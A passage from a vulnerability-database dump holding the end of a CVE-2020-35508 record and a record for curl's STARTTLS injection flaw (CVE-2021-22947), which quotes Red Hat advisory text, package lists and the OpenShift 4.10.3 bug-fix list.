"url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-44.50~20.04.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27777"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29568"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25668"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27675"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25669"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1019.21"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1023.24"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1024.26"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1016.19"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1021.22"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27830"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-44.50"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29569"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4751-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1023.25"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-377704"
},
{
"db": "VULMON",
"id": "CVE-2020-35508"
},
{
"db": "PACKETSTORM",
"id": "162654"
},
{
"db": "PACKETSTORM",
"id": "162626"
},
{
"db": "PACKETSTORM",
"id": "163584"
},
{
"db": "PACKETSTORM",
"id": "163589"
},
{
"db": "PACKETSTORM",
"id": "162877"
},
{
"db": "PACKETSTORM",
"id": "161556"
},
{
"db": "PACKETSTORM",
"id": "161555"
},
{
"db": "CNNVD",
"id": "CNNVD-202102-1668"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
},
{
"db": "NVD",
"id": "CVE-2020-35508"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-377704",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-35508",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162654",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162626",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163584",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163589",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162877",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "161556",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "161555",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202102-1668",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-35508",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-03-26T00:00:00",
"db": "VULHUB",
"id": "VHN-377704",
"ident": null
},
{
"date": "2021-03-26T00:00:00",
"db": "VULMON",
"id": "CVE-2020-35508",
"ident": null
},
{
"date": "2021-05-19T14:06:16",
"db": "PACKETSTORM",
"id": "162654",
"ident": null
},
{
"date": "2021-05-19T13:56:20",
"db": "PACKETSTORM",
"id": "162626",
"ident": null
},
{
"date": "2021-07-21T16:02:50",
"db": "PACKETSTORM",
"id": "163584",
"ident": null
},
{
"date": "2021-07-21T16:03:31",
"db": "PACKETSTORM",
"id": "163589",
"ident": null
},
{
"date": "2021-06-01T14:45:29",
"db": "PACKETSTORM",
"id": "162877",
"ident": null
},
{
"date": "2021-02-25T15:31:12",
"db": "PACKETSTORM",
"id": "161556",
"ident": null
},
{
"date": "2021-02-25T15:31:02",
"db": "PACKETSTORM",
"id": "161555",
"ident": null
},
{
"date": "2021-02-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202102-1668",
"ident": null
},
{
"date": "2021-12-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-016425",
"ident": null
},
{
"date": "2021-03-26T17:15:12.203000",
"db": "NVD",
"id": "CVE-2020-35508",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-12T00:00:00",
"db": "VULHUB",
"id": "VHN-377704",
"ident": null
},
{
"date": "2021-04-12T00:00:00",
"db": "VULMON",
"id": "CVE-2020-35508",
"ident": null
},
{
"date": "2023-02-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202102-1668",
"ident": null
},
{
"date": "2021-12-02T09:13:00",
"db": "JVNDB",
"id": "JVNDB-2020-016425",
"ident": null
},
{
"date": "2024-11-21T05:27:27.440000",
"db": "NVD",
"id": "CVE-2020-35508",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "161556"
},
{
"db": "PACKETSTORM",
"id": "161555"
},
{
"db": "CNNVD",
"id": "CNNVD-202102-1668"
}
],
"trust": 0.8
},
"title": {
"_id": null,
"data": "Linux\u00a0Kernel\u00a0 Initialization vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202102-1668"
}
],
"trust": 0.6
}
}
VAR-202109-1789
Vulnerability from variot - Updated: 2026-03-09 21:33 When curl >= 7.20.0 and <= 7.78.0 connects to an IMAP or POP3 server to retrieve data using STARTTLS to upgrade to TLS security, the server can respond and send back multiple responses at once that curl caches. curl would then upgrade to TLS but not flush the in-queue of cached responses, instead continuing to use and trust the responses it got before the TLS handshake as if they were authenticated. This flaw allows a Man-In-The-Middle attacker to first inject fake responses, then pass through the TLS traffic from the legitimate server and trick curl into sending data back to the user, who believes the attacker's injected data comes from the TLS-protected server. A STARTTLS protocol injection flaw via man-in-the-middle was found in curl prior to 7.79.0. Such multiple "pipelined" responses are cached by curl. Over POP3 and IMAP an attacker can inject fake response data. Relevant releases/architectures:
.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 .NET Core on Red Hat Enterprise Linux Server (v. 7) - x86_64 .NET Core on Red Hat Enterprise Linux Workstation (v. 7) - x86_64
- Description:
.NET Core is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.
Security Fix(es):
-
curl: Leak of authentication credentials in URL via automatic Referer (CVE-2021-22876)
-
curl: Bad connection reuse due to flawed path name checks (CVE-2021-22924)
-
curl: Requirement to use TLS not properly enforced for IMAP, POP3, and FTP protocols (CVE-2021-22946)
-
curl: Server responses received before STARTTLS processed after TLS handshake (CVE-2021-22947)
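The advisory text above gives the affected range for CVE-2021-22947 as curl >= 7.20.0 and <= 7.78.0, with the upstream fix landing in 7.79.0. A minimal sketch of a version-range check against that range, assuming plain dotted version strings (the function name and parsing helper are illustrative, not part of any advisory tooling):

```python
# Hedged sketch: test whether a curl version string falls inside the range
# the advisory names as affected by CVE-2021-22947 (>= 7.20.0, <= 7.78.0).
def parse_version(v: str) -> tuple:
    """Parse a dotted version string like '7.61.1' into a comparable tuple."""
    return tuple(int(part) for part in v.split("."))

def affected_by_cve_2021_22947(version: str) -> bool:
    """True if the version lies in the advisory's affected range."""
    return parse_version("7.20.0") <= parse_version(version) <= parse_version("7.78.0")

# 7.61.1 (the rh-dotnet31 package base version above) is inside the range;
# Red Hat ships fixes as backports, so the RPM release, not this number,
# indicates whether a given build is patched.
print(affected_by_cve_2021_22947("7.61.1"))  # True
print(affected_by_cve_2021_22947("7.79.0"))  # False
```

Note that for distribution packages the upstream version alone is not authoritative: the advisory fixes 7.61.1-based RPMs by backport, so the package release (here -22.el7_9) is what actually signals the fix.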
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Package List:
.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7):
Source: rh-dotnet31-curl-7.61.1-22.el7_9.src.rpm
x86_64: rh-dotnet31-curl-7.61.1-22.el7_9.x86_64.rpm rh-dotnet31-curl-debuginfo-7.61.1-22.el7_9.x86_64.rpm rh-dotnet31-libcurl-7.61.1-22.el7_9.x86_64.rpm rh-dotnet31-libcurl-devel-7.61.1-22.el7_9.x86_64.rpm
.NET Core on Red Hat Enterprise Linux Server (v. 7):
Source: rh-dotnet31-curl-7.61.1-22.el7_9.src.rpm
x86_64: rh-dotnet31-curl-7.61.1-22.el7_9.x86_64.rpm rh-dotnet31-curl-debuginfo-7.61.1-22.el7_9.x86_64.rpm rh-dotnet31-libcurl-7.61.1-22.el7_9.x86_64.rpm rh-dotnet31-libcurl-devel-7.61.1-22.el7_9.x86_64.rpm
.NET Core on Red Hat Enterprise Linux Workstation (v. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Description:
Red Hat Advanced Cluster Management for Kubernetes 2.2.10 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments.
Clusters and applications are all visible and managed from a single console — with security policy built in. Bugs fixed (https://bugzilla.redhat.com/):
2004944 - CVE-2021-23440 nodejs-set-value: type confusion allows bypass of CVE-2019-10747 2006009 - CVE-2021-3795 semver-regex: inefficient regular expression complexity 2013652 - RHACM 2.2.10 images
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: OpenShift Container Platform 4.10.3 security update Advisory ID: RHSA-2022:0056-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2022:0056 Issue date: 2022-03-10 CVE Names: CVE-2014-3577 CVE-2016-10228 CVE-2017-14502 CVE-2018-20843 CVE-2018-1000858 CVE-2019-8625 CVE-2019-8710 CVE-2019-8720 CVE-2019-8743 CVE-2019-8764 CVE-2019-8766 CVE-2019-8769 CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 CVE-2019-8846 CVE-2019-9169 CVE-2019-13050 CVE-2019-13627 CVE-2019-14889 CVE-2019-15903 CVE-2019-19906 CVE-2019-20454 CVE-2019-20807 CVE-2019-25013 CVE-2020-1730 CVE-2020-3862 CVE-2020-3864 CVE-2020-3865 CVE-2020-3867 CVE-2020-3868 CVE-2020-3885 CVE-2020-3894 CVE-2020-3895 CVE-2020-3897 CVE-2020-3899 CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 CVE-2020-8927 CVE-2020-9802 CVE-2020-9803 CVE-2020-9805 CVE-2020-9806 CVE-2020-9807 CVE-2020-9843 CVE-2020-9850 CVE-2020-9862 CVE-2020-9893 CVE-2020-9894 CVE-2020-9895 CVE-2020-9915 CVE-2020-9925 CVE-2020-9952 CVE-2020-10018 CVE-2020-11793 CVE-2020-13434 CVE-2020-14391 CVE-2020-15358 CVE-2020-15503 CVE-2020-25660 CVE-2020-25677 CVE-2020-27618 CVE-2020-27781 CVE-2020-29361 CVE-2020-29362 CVE-2020-29363 CVE-2021-3121 CVE-2021-3326 CVE-2021-3449 CVE-2021-3450 CVE-2021-3516 CVE-2021-3517 CVE-2021-3518 CVE-2021-3520 CVE-2021-3521 CVE-2021-3537 CVE-2021-3541 CVE-2021-3733 CVE-2021-3749 CVE-2021-20305 CVE-2021-21684 CVE-2021-22946 CVE-2021-22947 CVE-2021-25215 CVE-2021-27218 CVE-2021-30666 CVE-2021-30761 CVE-2021-30762 CVE-2021-33928 CVE-2021-33929 CVE-2021-33930 CVE-2021-33938 CVE-2021-36222 CVE-2021-37750 CVE-2021-39226 CVE-2021-41190 CVE-2021-43813 CVE-2021-44716 CVE-2021-44717 CVE-2022-0532 CVE-2022-21673 CVE-2022-24407 =====================================================================
- Summary:
Red Hat OpenShift Container Platform release 4.10.3 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.10.3. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHSA-2022:0055
Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html
Security Fix(es):
- gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)
- grafana: Snapshot authentication bypass (CVE-2021-39226)
- golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
- nodejs-axios: Regular expression denial of service in trim function (CVE-2021-3749)
- golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
- grafana: Forward OAuth Identity Token can allow users to access some data sources (CVE-2022-21673)
- grafana: directory traversal vulnerability (CVE-2021-43813)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.3-x86_64
The image digest is sha256:7ffe4cd612be27e355a640e5eec5cd8f923c1400d969fd590f806cffdaabcc56
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.3-s390x
The image digest is sha256:4cf21a9399da1ce8427246f251ae5dedacfc8c746d2345f9cfe039ed9eda3e69
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.3-ppc64le
The image digest is sha256:4ee571da1edf59dfee4473aa4604aba63c224bf8e6bcf57d048305babbbde93c
All OpenShift Container Platform 4.10 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html
- Solution:
For OpenShift Container Platform 4.10 see the following documentation, which will be updated shortly for this release, for moderate instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
1808240 - Always return metrics value for pods under the user's namespace
1815189 - feature flagged UI does not always become available after operator installation
1825034 - e2e: Mock CSI tests fail on IBM ROKS clusters
1826225 - edge terminated h2 (gRPC) connections need a haproxy template change to work correctly
1860774 - csr for vSphere egress nodes were not approved automatically during cert renewal
1878106 - token inactivity timeout is not shortened after oauthclient/oauth config values are lowered
1878925 - 'oc adm upgrade --to ...' rejects versions which occur only in history, while the cluster-version operator supports history fallback
1880738 - origin e2e test deletes original worker
1882983 - oVirt csi driver should refuse to provision RWX and ROX PV
1886450 - Keepalived router id check not documented for RHV/VMware IPI
1889488 - The metrics endpoint for the Scheduler is not protected by RBAC
1894431 - Router pods fail to boot if the SSL certificate applied is missing an empty line at the bottom
1896474 - Path based routing is broken for some combinations
1897431 - CIDR support for additional network attachment with the bridge CNI plug-in
1903408 - NodePort externalTrafficPolicy does not work for ovn-kubernetes
1907433 - Excessive logging in image operator
1909906 - The router fails with PANIC error when stats port already in use
1911173 - [MSTR-998] Many charts' legend names show {{}} instead of words
1914053 - pods assigned with Multus whereabouts IP get stuck in ContainerCreating state after node rebooting.
1916169 - a reboot while MCO is applying changes leaves the node in undesirable state and MCP looks fine (UPDATED=true)
1917893 - [ovirt] install fails: due to terraform error "Cannot attach Virtual Disk: Disk is locked" on vm resource
1921627 - GCP UPI installation failed due to exceeding gcp limitation of instance group name
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation
1926522 - oc adm catalog does not clean temporary files
1927478 - Default CatalogSources deployed by marketplace do not have toleration for tainted nodes.
1928141 - kube-storage-version-migrator constantly reporting type "Upgradeable" status Unknown
1928285 - [LSO][OCS][arbiter] OCP Console shows no results while in fact underlying setup of LSO localvolumeset and it's storageclass is not yet finished, confusing users
1931594 - [sig-cli] oc --request-timeout works as expected fails frequently on s390x
1933847 - Prometheus goes unavailable (both instances down) during 4.8 upgrade
1937085 - RHV UPI inventory playbook missing guarantee_memory
1937196 - [aws ebs csi driver] events for block volume expansion may cause confusion
1938236 - vsphere-problem-detector does not support overriding log levels via storage CR
1939401 - missed labels for CMO/openshift-state-metric/telemeter-client/thanos-querier pods
1939435 - Setting an IPv6 address in noProxy field causes error in openshift installer
1939552 - [sig-api-machinery] CustomResourcePublishOpenAPI [Privileged:ClusterAdmin] works for CRD preserving unknown fields in an embedded object [Conformance] [Suite:openshift/conformance/parallel/minimal] [Suite:k8s]
1942913 - ThanosSidecarUnhealthy isn't resilient to WAL replays.
1943363 - [ovn] CNO should gracefully terminate ovn-northd
1945274 - ostree-finalize-staged.service failed while upgrading a rhcos node to 4.6.17
1948080 - authentication should not set Available=False APIServices_Error with 503s
1949262 - Prometheus Statefulsets should have 2 replicas and hard affinity set
1949672 - [GCP] Update 4.8 UPI template to match ignition version: 3.2.0
1950827 - [LSO] localvolumediscoveryresult name is not friendly to customer
1952576 - csv_succeeded metric not present in olm-operator for all successful CSVs
1953264 - "remote error: tls: bad certificate" logs in prometheus-operator container
1955300 - Machine config operator reports unavailable for 23m during upgrade
1955489 - Alertmanager Statefulsets should have 2 replicas and hard affinity set
1955490 - Thanos ruler Statefulsets should have 2 replicas and hard affinity set
1955544 - [IPI][OSP] densed master-only installation with 0 workers fails due to missing worker security group on masters
1956496 - Needs SR-IOV Docs Upstream
1956739 - Permission for authorized_keys for core user changes from core user to root when changed the pull secret
1956776 - [vSphere] Installer should do pre-check to ensure user-provided network name is valid
1956964 - upload a boot-source to OpenShift virtualization using the console
1957547 - [RFE]VM name is not auto filled in dev console
1958349 - ovn-controller doesn't release the memory after cluster-density run
1959352 - [scale] failed to get pod annotation: timed out waiting for annotations
1960378 - icsp allows mirroring of registry root - install-config imageContentSources does not
1960674 - Broken test: [sig-imageregistry][Serial][Suite:openshift/registry/serial] Image signature workflow can push a signed image to openshift registry and verify it [Suite:openshift/conformance/serial]
1961317 - storage ClusterOperator does not declare ClusterRoleBindings in relatedObjects
1961391 - String updates
1961509 - DHCP daemon pod should have CPU and memory requests set but not limits
1962066 - Edit machine/machineset specs not working
1962206 - openshift-multus/dhcp-daemon set should meet platform requirements for update strategy that have maxUnavailable update of 10 or 33 percent
1963053 - oc whoami --show-console should show the web console URL, not the server api URL
1964112 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters
1964327 - Support containers with name:tag@digest
1964789 - Send keys and disconnect does not work for VNC console
1965368 - ClusterQuotaAdmission received non-meta object - message constantly reported in OpenShift Container Platform 4.7
1966445 - Unmasking a service doesn't work if it masked using MCO
1966477 - Use GA version in KAS/OAS/OauthAS to avoid: "audit.k8s.io/v1beta1" is deprecated and will be removed in a future release, use "audit.k8s.io/v1" instead
1966521 - kube-proxy's userspace implementation consumes excessive CPU
1968364 - [Azure] when using ssh type ed25519 bootstrap fails to come up
1970021 - nmstate does not persist its configuration due to overlay systemd-connections-merged mount
1970218 - MCO writes incorrect file contents if compression field is specified
1970331 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install [Suite:openshift/conformance/parallel]
1970805 - Cannot create build when docker image url contains dir structure
1972033 - [azure] PV region node affinity is failure-domain.beta.kubernetes.io instead of topology.kubernetes.io
1972827 - image registry does not remain available during upgrade
1972962 - Should set the minimum value for the --max-icsp-size flag of oc adm catalog mirror
1973447 - ovn-dbchecker peak memory spikes to ~500MiB during cluster-density run
1975826 - ovn-kubernetes host directed traffic cannot be offloaded as CT zone 64000 is not established
1976301 - [ci] e2e-azure-upi is permafailing
1976399 - During the upgrade from OpenShift 4.5 to OpenShift 4.6 the election timers for the OVN north and south databases did not change.
1976674 - CCO didn't set Upgradeable to False when cco mode is configured to Manual on azure platform
1976894 - Unidling a StatefulSet does not work as expected
1977319 - [Hive] Remove stale cruft installed by CVO in earlier releases
1977414 - Build Config timed out waiting for condition 400: Bad Request
1977929 - [RFE] Display Network Attachment Definitions from openshift-multus namespace during OCS deployment via UI using Multus
1978528 - systemd-coredump started and failed intermittently for unknown reasons
1978581 - machine-config-operator: remove runlevel from mco namespace
1979562 - Cluster operators: don't show messages when neither progressing, degraded or unavailable
1979962 - AWS SDN Network Stress tests have not passed in 4.9 release-openshift-origin-installer-e2e-aws-sdn-network-stress-4.9
1979966 - OCP builds always fail when run on RHEL7 nodes
1981396 - Deleting pool inside pool page the pool stays in Ready phase in the heading
1981549 - Machine-config daemon does not recover from broken Proxy configuration
1981867 - [sig-cli] oc explain should contain proper fields description for special types [Suite:openshift/conformance/parallel]
1981941 - Terraform upgrade required in openshift-installer to resolve multiple issues
1982063 - 'Control Plane' is not translated in Simplified Chinese language in Home->Overview page
1982498 - Default registry credential path should be adjusted to use containers/auth.json for oc commands
1982662 - Workloads - DaemonSets - Add storage: i18n misses
1982726 - kube-apiserver audit logs show a lot of 404 errors for DELETE "/secrets/encryption-config" on single node clusters
1983758 - upgrades are failing on disruptive tests
1983964 - Need Device plugin configuration for the NIC "needVhostNet" & "isRdma"
1984592 - global pull secret not working in OCP4.7.4+ for additional private registries
1985073 - new-in-4.8 ExtremelyHighIndividualControlPlaneCPU fires on some GCP update jobs
1985486 - Cluster Proxy not used during installation on OSP with Kuryr
1985724 - VM Details Page missing translations
1985838 - [OVN] CNO exportNetworkFlows does not clear collectors when deleted
1985933 - Downstream image registry recommendation
1985965 - oVirt CSI driver does not report volume stats
1986216 - [scale] SNO: Slow Pod recovery due to "timed out waiting for OVS port binding"
1986237 - "MachineNotYetDeleted" in Pending state , alert not fired
1986239 - crictl create fails with "PID namespace requested, but sandbox infra container invalid"
1986302 - console continues to fetch prometheus alert and silences for normal user
1986314 - Current MTV installation for KubeVirt import flow creates unusable Forklift UI
1986338 - error creating list of resources in Import YAML
1986502 - yaml multi file dnd duplicates previous dragged files
1986819 - fix string typos for hot-plug disks
1987044 - [OCPV48] Shutoff VM is being shown as "Starting" in WebUI when using spec.runStrategy Manual/RerunOnFailure
1987136 - Declare operatorframework.io/arch. labels for all operators
1987257 - Go-http-client user-agent being used for oc adm mirror requests
1987263 - fsSpaceFillingUpWarningThreshold not aligned to Kubernetes Garbage Collection Threshold
1987445 - MetalLB integration: All gateway routers in the cluster answer ARP requests for LoadBalancer services IP
1988406 - SSH key dropped when selecting "Customize virtual machine" in UI
1988440 - Network operator changes ovnkube-config too early causing ovnkube-master pods to crashloop during cluster upgrade
1988483 - Azure drop ICMP need to frag FRAG when using OVN: openshift-apiserver becomes False after env runs some time due to communication between one master to pods on another master fails with "Unable to connect to the server"
1988879 - Virtual media based deployment fails on Dell servers due to pending Lifecycle Controller jobs
1989438 - expected replicas is wrong
1989502 - Developer Catalog is disappearing after short time
1989843 - 'More' and 'Show Less' functions are not translated on several pages
1990014 - oc debug does not work for Windows pods
1990190 - e2e testing failed with basic manifest: reason/ExternalProvisioning waiting for a volume to be created
1990193 - 'more' and 'Show Less' is not being translated on Home -> Search page
1990255 - Partial or all of the Nodes/StorageClasses don't appear back on UI after text is removed from search bar
1990489 - etcdHighNumberOfFailedGRPCRequests fires only on metal env in CI
1990506 - Missing udev rules in initramfs for /dev/disk/by-id/scsi- symlinks
1990556 - get-resources.sh doesn't honor the no_proxy settings even with no_proxy var
1990625 - Ironic agent registers with SLAAC address with privacy-stable
1990635 - CVO does not recognize the channel change if desired version and channel changed at the same time
1991067 - github.com can not be resolved inside pods where cluster is running on openstack.
1991573 - Enable typescript strictNullCheck on network-policies files
1991641 - Baremetal Cluster Operator still Available After Delete Provisioning
1991770 - The logLevel and operatorLogLevel values do not work with Cloud Credential Operator
1991819 - Misspelled word "ocurred" in oc inspect cmd
1991942 - Alignment and spacing fixes
1992414 - Two rootdisks show on storage step if 'This is a CD-ROM boot source' is checked
1992453 - The configMap failed to save on VM environment tab
1992466 - The button 'Save' and 'Reload' are not translated on vm environment tab
1992475 - The button 'Open console in New Window' and 'Disconnect' are not translated on vm console tab
1992509 - Could not customize boot source due to source PVC not found
1992541 - all the alert rules' annotations "summary" and "description" should comply with the OpenShift alerting guidelines
1992580 - storageProfile should stay with the same value by check/uncheck the apply button
1992592 - list-type missing in oauth.config.openshift.io for identityProviders breaking Server Side Apply
1992777 - [IBMCLOUD] Default "ibm_iam_authorization_policy" is not working as expected in all scenarios
1993364 - cluster destruction fails to remove router in BYON with Kuryr as primary network (even after BZ 1940159 got fixed)
1993376 - periodic-ci-openshift-release-master-ci-4.6-upgrade-from-stable-4.5-e2e-azure-upgrade is permafailing
1994094 - Some hardcodes are detected at the code level in OpenShift console components
1994142 - Missing required cloud config fields for IBM Cloud
1994733 - MetalLB: IP address is not assigned to service if there is duplicate IP address in two address pools
1995021 - resolv.conf and corefile sync slows down/stops after keepalived container restart
1995335 - [SCALE] ovnkube CNI: remove ovs flows check
1995493 - Add Secret to workload button and Actions button are not aligned on secret details page
1995531 - Create RDO-based Ironic image to be promoted to OKD
1995545 - Project drop-down amalgamates inside main screen while creating storage system for odf-operator
1995887 - [OVN]After reboot egress node, lr-policy-list was not correct, some duplicate records or missed internal IPs
1995924 - CMO should report Upgradeable: false when HA workload is incorrectly spread
1996023 - kubernetes.io/hostname values are larger than filter when create localvolumeset from webconsole
1996108 - Allow backwards compatibility of shared gateway mode to inject host-based routes into OVN
1996624 - 100% of the cco-metrics/cco-metrics targets in openshift-cloud-credential-operator namespace are down
1996630 - Fail to delete the first Authorized SSH Key input box on Advanced page
1996647 - Provide more useful degraded message in auth operator on DNS errors
1996736 - Large number of 501 lr-policies in INCI2 env
1996886 - timedout waiting for flows during pod creation and ovn-controller pegged on worker nodes
1996916 - Special Resource Operator(SRO) - Fail to deploy simple-kmod on GCP
1996928 - Enable default operator indexes on ARM
1997028 - prometheus-operator update removes env var support for thanos-sidecar
1997059 - Failed to create cluster in AWS us-east-1 region due to a local zone is used
1997226 - Ingresscontroller reconcilations failing but not shown in operator logs or status of ingresscontroller.
1997245 - "Subscription already exists in openshift-storage namespace" error message is seen while installing odf-operator via UI
1997269 - Have to refresh console to install kube-descheduler
1997478 - Storage operator is not available after reboot cluster instances
1997509 - flake: [sig-cli] oc builds new-build [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
1997967 - storageClass is not reserved from default wizard to customize wizard
1998035 - openstack IPI CI: custom var-lib-etcd.mount (ramdisk) unit is racing due to incomplete After/Before order
1998038 - [e2e][automation] add tests for UI for VM disk hot-plug
1998087 - Fix CephHealthCheck wrapping contents and add data-tests for HealthItem and SecondaryStatus
1998174 - Create storageclass gp3-csi after install ocp cluster on aws
1998183 - "r: Bad Gateway" info is improper
1998235 - Firefox warning: Cookie “csrf-token” will be soon rejected
1998377 - Filesystem table head is not full displayed in disk tab
1998378 - Virtual Machine is 'Not available' in Home -> Overview -> Cluster inventory
1998519 - Add fstype when create localvolumeset instance on web console
1998951 - Keepalived conf ingress peer on in Dual stack cluster contains both IPv6 and IPv4 addresses
1999076 - [UI] Page Not Found error when clicking on Storage link provided in Overview page
1999079 - creating pods before sriovnetworknodepolicy sync up succeed will cause node unschedulable
1999091 - Console update toast notification can appear multiple times
1999133 - removing and recreating static pod manifest leaves pod in error state
1999246 - .indexignore is not ignored when oc command loads dc configuration
1999250 - ArgoCD in GitOps operator can't manage namespaces
1999255 - ovnkube-node always crashes out the first time it starts
1999261 - ovnkube-node log spam (and security token leak?)
1999309 - While installing odf-operator via UI, web console update pop-up navigates to OperatorHub -> Operator Installation page
1999314 - console-operator is slow to mark Degraded as False once console starts working
1999425 - kube-apiserver with "[SHOULD NOT HAPPEN] failed to update managedFields" err="failed to convert new object (machine.openshift.io/v1beta1, Kind=MachineHealthCheck)
1999556 - "master" pool should be updated before the CVO reports available at the new version occurred
1999578 - AWS EFS CSI tests are constantly failing
1999603 - Memory Manager allows Guaranteed QoS Pod with hugepages requested is exactly equal to the left over Hugepages
1999619 - cloudinit is malformatted if a user sets a password during VM creation flow
1999621 - Empty ssh_authorized_keys entry is added to VM's cloudinit if created from a customize flow
1999649 - MetalLB: Only one type of IP address can be assigned to service on dual stack cluster from a address pool that have both IPv4 and IPv6 addresses defined
1999668 - openshift-install destroy cluster panic's when given invalid credentials to cloud provider (Azure Stack Hub)
1999734 - IBM Cloud CIS Instance CRN missing in infrastructure manifest/resource
1999771 - revert "force cert rotation every couple days for development" in 4.10
1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function
1999796 - Openshift Console Helm tab is not showing helm releases in a namespace when there is high number of deployments in the same namespace.
1999836 - Admin web-console inconsistent status summary of sparse ClusterOperator conditions
1999903 - Click "This is a CD-ROM boot source" ticking "Use template size PVC" on pvc upload form
1999983 - No way to clear upload error from template boot source
2000081 - [IPI baremetal] The metal3 pod failed to restart when switching from Disabled to Managed provisioning without specifying provisioningInterface parameter
2000096 - Git URL is not re-validated on edit build-config form reload
2000216 - Successfully imported ImageStreams are not resolved in DeploymentConfig
2000236 - Confusing usage message from dynkeepalived CLI
